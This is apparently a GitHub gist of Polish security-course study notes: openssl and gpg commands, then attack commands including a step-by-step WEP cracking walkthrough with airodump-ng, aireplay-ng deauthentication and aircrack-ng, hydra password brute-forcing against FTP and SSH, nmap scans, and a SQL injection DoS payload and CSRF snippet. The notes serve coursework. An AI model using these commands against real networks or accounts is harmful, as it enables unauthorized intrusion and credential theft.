Skip to content

Instantly share code, notes, and snippets.

@mkondratek
Last active June 11, 2018 12:16
Show Gist options
  • Save mkondratek/e206d3f0fa196e795bbfcaad93142f3c to your computer and use it in GitHub Desktop.
Save mkondratek/e206d3f0fa196e795bbfcaad93142f3c to your computer and use it in GitHub Desktop.
#TODO place this file on gist
[1,openssl] openssl aes-256-cbc -salt -in secrets.txt -out secrets.txt.enc
[1,openssl] openssl aes-256-cbc -d -in secrets.txt.enc -out secrets.txt.new
[2,openssl] openssl dgst -sha256 -sign srvexam.key -out secret.txt.sha256 secret.txt
[2,openssl] openssl dgst -sha256 -verify <(openssl x509 -in srvexam.crt -pubkey -noout) -signature secret.txt.sha256 secret.txt
[x,openssl] openssl req -newkey rsa:4096 -nodes -keyout srvname.key -x509 -days 31 -out srvname.crt #gen key and crt
[x,openssl] openssl req -key srvname.key -new -x509 -days 31 -out srvname.crt #gen crt from key
[x,openssl] openssl x509 -signkey srvname.key -in srvname.csr -req -days 31 -out srvname.crt #gen crt from key and csr
[4,gnupg,pgp] gpg --output doc.gpg --encrypt --recipient blake@cyb.org doc
[4,gnupg,pgp] gpg --output doc --decrypt doc.gpg
[5,openssl,self-signed] openssl req -x509 -newkey rsa:4096 -keyout sskey.pem -out sscert.pem -days 365
[5,openssl,self-signed] openssl verify -untrusted sscert.pem sscert.pem
[6,fileextraction] todo (archive? file signatures?)
[7,wep] #monitoring mode
[7,wep] iwconfig
[7,wep] sudo ifconfig wlan0 up
[7,wep] sudo airmon-ng start wlan0
[7,wep] ifconfig wlan0mon
[7,wep] #scanning
[7,wep] sudo airodump-ng wlan0mon
[7,wep] sudo ifconfig wlan0mon down
[7,wep] sudo iwconfig wlan0mon channel 4
[7,wep] sudo iwconfig wlan0mon
[7,wep] #pockets injection
[7,wep] sudo airodump-ng mon0
[7,wep] sudo iwconfig mon0 channel 4
[7,wep] sudo aireplay-ng -9 -e ConnectEverybodyNow -a <MAC AP> mon0
[7,wep] solution #1
[7,wep] #Najpierw sprawdzamy, czy ktoś jest podłączony do punktu dostępowego:
[7,wep] sudo airodump-ng -c 10 -a --bssid <MAC AP> wlan0mon
[7,wep] #Nasłuchujemy komunikację z wybranym AP i zapisujemy ją do pliku:
[7,wep] sudo airodump-ng wlan0mon -c 10 --bssid <MAC AP> -w wep_1
[7,wep] #Teraz czekamy, aż uprawniony użytkownik się zaloguje. Jeżeli nie chcemy czekać, możemy wysłać pakiet rozłączający klienta:
[7,wep] sudo aireplay-ng -0 5 -a <MAC AP> -c <MAC Klienta> wlan0mon
[7,wep] #po tym poleceniu należy sprawdzić, czy w pojawił się plik z rozszerzeniem xor - w tym pliku jest strumień klucza, który będzie nam teraz potrzebny do sfałoszowania uwierzytelnienia:
[7,wep] sudo aireplay-ng -1 0 -e HackingExercises -y wep_1*.xor -a <MAC AP> -h aa:bb:cc:dd:ee:ff wlan0mon
[7,wep] solution #2
[7,wep] #Podobnie jak wcześniej nasłuchujemy pakiety wymieniane z wybranym AP i zapisujemy je do pliku:
[7,wep] sudo airodump-ng wlan0mon -c 10 --bssid <MAC AP> -w wep_2
[7,wep] Widać, że przechwyconych pakietów jest mało (a potrzebujemy kilkadziesiąt tysięcy pakietów), trzeba proces przyspieszyć przez wstrzykiwanie pakietów ARP
[7,wep] sudo aireplay-ng -3 -b <MAC AP> -h <MAC Klienta> wlan0mon
[7,wep] Gdy liczba przechwyconych paczek będzie rosła za wolno, można spróbować zdeautentykować użytkownika, po ponownym podłączeniu wszystko zacznie działać dużo szybciej
[7,wep] Po chwili okaże się, że możemy spróbować złamać hasło: ```bash sudo aircrack-ng wep_2*.cap
[8,sqlinjection] todo
[9,xssinjection] todo
[10.peanalisis] strings #search for strings
[10.peanalisis] https://www.virustotal.com/#/home/upload
[10.peanalisis] hexdump -C file.exe #https://en.wikipedia.org/wiki/List_of_file_signatures
[11,metasploit,msf] https://www.offensive-security.com/metasploit-unleashed/
[12,hydra] hydra -l user -P passlist.txt ftp://192.168.0.1
[12,hydra] hydra -l root -P passlist.txt 192.168.0.1 ssh
[13,nc,nmap] nmap -A -O 192.168.43.1-255
[13,nc,nmap] nc -vz 192.168.43.250 20-80 #test for opened ports
[14,john] place custom rules in john/run/john.conf
[14,john] cAz"[,.!?@#_][0-9]" #capitalize first letter, use one special character and one digit
[14,john] john/run/john --format=Raw-MD5 --rules=some_rule --wordlist=./dict.txt ./hashes.txt
[1,rsa]
[2,block_cipher] CBC(cipher block chaining), ECB(electrionig codebook)
[3,ssh,connecting]
[4,ssh,tunneling]
[5,ssl/tls]
[6,pki] Public key infrastructure - jednostki i procesy do zarządzania
[6,pki] tworzenia, przechowywania, reaktywowania certyfikatów.
[6,pki] Szczególnie stosowane w ebiznesie, bankowości, administracji
[6,pki] oraz poufnej komunikacji.
[6,pki] CertA, RegA, VerA
[6,pki]
[6,pki]
[6,pki]
[6,pki]
[6,pki]
[7,gpg]
[8,web_of_trust,wot]
[9,vpn]
[10,ipsec]
[11,tor]
[12,crpytography_vs_steganography]
[13,trivial_bits_cipher]
[14,chaum,blind_signatures] chaum proposal
[14,chaum,blind_signatures] -tajna kwota, odbiorca i czas
[14,chaum,blind_signatures] -mozliwosc odtajnienia
[14,chaum,blind_signatures] -mozliwosc zablokowania kradzionych pieniedzy
[14,chaum,blind_signatures] podpisujący zna s' (trudna do odwrocenia)
[14,chaum,blind_signatures] publiczna s, s(s'(x)) = x
[14,chaum,blind_signatures] dostawca, odpowiednio c i c', c'(s'(c(x))) = s'(x)
[14,chaum,blind_signatures] proces: dostawca wysyła c(x)
[14,chaum,blind_signatures] podpisujący odsyła s'(c(x))
[14,chaum,blind_signatures] dostawca oblica c'(s'(c(x))) czyli s'(x)
[14,chaum,blind_signatures] można sprawdzić czy podpisujący podpisał licząć s(s'(x))
[14,chaum,blind_signatures]
[15,goofy,scrooge] goofy ma monete podpisaną kluczem z informacją o twórcy i id
[15,goofy,scrooge] przekazanie alicji, hash referencji na monete, informacja
[15,goofy,scrooge] o tym że alicja jest nową właścicielką i podpis goofiego
[15,goofy,scrooge] alicja może podać monetę dalej
[15,goofy,scrooge] wady: wielokrotne użycie monety
[15,goofy,scrooge] sknerus jest wydawcą monet, akceptuje i podpisuje
[15,goofy,scrooge] lub nie transakcje
[15,goofy,scrooge] sknerus ma pełną kontrolę, a my mu nie ufamy
[16,btc,miners]
[17,wep]
[18,wpa]
[19,csrf] cross site request forgery
[19,csrf] Wykorzystuje konkretną witrynę i jej zaufanie do użytkownika.
[19,csrf] W nieświadomości klienta podejmuje możliwe złośliwe akcje.
[19,csrf] Zależy od podatności przeglądarki na odbieranie i wykonywanie
[19,csrf] złośliwych pakietów. Nie wymaga JSa. Złośliwy kod
[19,csrf] znajduje się u atakującego.
[19,csrf] <img src=”https://www.company.example/action” width=”0” height=”0”>
[19,csrf] onload='document.form.submit()'
[19,csrf] from, method=POST, hidden values
[19,csrf] niekoniecznie zmienia treść stron, może dotyczyć FTP (vs XSS)
[19,csrf] hasła jednorazowe!
[19,csrf] czas ważności sesji
[20,xss,sql,injection] SQL INJECTION
[20,xss,sql,injection] 1=1
[20,xss,sql,injection] boolean, union
[20,xss,sql,injection] dos, x' AND BENCHMARK(999999,MD5(NOW()))=0 OR '1'='1
[20,xss,sql,injection] multiple statements, seperated with ;
[20,xss,sql,injection] p r e p a r e d s t a t e m e n t s
[20,xss,sql,injection] XSS INJECTION
[20,xss,sql,injection] fora, komentarze
[20,xss,sql,injection] phishing - wyłudzanie informacji
[20,xss,sql,injection] kradzież ciasteczek
[20,xss,sql,injection] s a n i t i n p u t
[20,xss,sql,injection] XSS INJECTION VIA SQL INJECTION
[21,malware] rezydentne, makro (biurowe), polimorficzne (auto szyfrowane),
[21,malware] metamorficzne (zmieniające swój kod)
[21,malware] backdoor, keylogger, file binder, szantaż, adware, koń trojański
[21,malware] form grabber, hoax (nitki), rootkit (file hiding)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment